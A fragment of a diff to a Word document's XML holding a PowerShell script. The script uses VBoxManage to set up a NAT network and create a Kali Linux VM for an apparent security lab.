+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6847,16 +5438,158 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>with</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> add --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>netname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --network "192.168.0.0/24" --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on --ipv6 off --enable</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Start NAT network</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Write-Output "Starting NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6865,16 +5598,183 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>desired</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> start --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>netname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Start-Sleep 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 2. Create Kali VM for attack | +- 2min</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Register VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6883,70 +5783,204 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>settings</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Write-Output "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Creating</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>createvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --name $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ostype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'Debian_64' --register</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Set VM settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cpus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>graphicscontroller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vmsvga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --nat-network1 $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -6955,25 +5989,51 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>'."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add a SATA storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6982,7 +6042,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6991,16 +6051,105 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --name 'SATA' --add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --controller </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>IntelAHCI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --bootable on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add existing VDI to SATA controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -7009,570 +6158,16 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>netname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "192.168.0.0/24" --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>dhcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on --ipv6 off --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>enable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Start NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Write-Output "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Starting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>'."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
